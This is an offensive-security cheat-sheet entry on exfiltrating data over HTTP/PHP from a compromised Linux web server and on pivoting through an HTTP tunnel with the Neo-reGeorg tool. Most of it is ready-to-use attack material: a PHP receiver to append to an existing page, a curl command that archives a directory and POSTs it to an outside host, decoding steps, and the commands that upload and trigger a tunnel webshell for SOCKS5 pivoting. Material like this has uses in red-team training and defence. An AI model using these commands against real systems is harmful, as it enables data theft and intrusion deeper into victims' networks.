killchain-compendium/exfiltration/linux/http_php.md

48 lines
1004 B
Markdown

# HTTP/PHP Exfiltration
* On a pwned web server concat the following PHP code to an existing page
```php
<?php
if (isset($_POST['file'])) {
$file = fopen("/tmp/out.b64","w");
fwrite($file, $_POST['file']);
fclose($file);
}
?>
```
* POST the payload to the controlled web server
```sh
curl --data "file=$(tar zcf - <directory> | base64)" http://example.com/about.php
```
* Prepare the stored file through removing the url encoding
```sh
sudo sed -i 's/ /+/g' /tmp/out.b64
```
* Unarchive the data
```sh
cat /tmp/out.b64 | base64 -d | tar xvfz -
```
## Pivot via Tunneling over HTTP
* [Neo-reGeorg's tool](https://github.com/L-codes/Neo-reGeorg)
* Generate an encrypted client with a key via
```sh
python3 neoreg.py generate -k key.enc
```
* Upload `tunnel.php` to the web server created
* Trigger the tunnel via
```sh
python3 neoreg.py -k key.enc -u http://example.com/tunnel.php
```
* Start socks5 via
```sh
curl --socks5 127.0.0.1:1080 http://target.example.com
```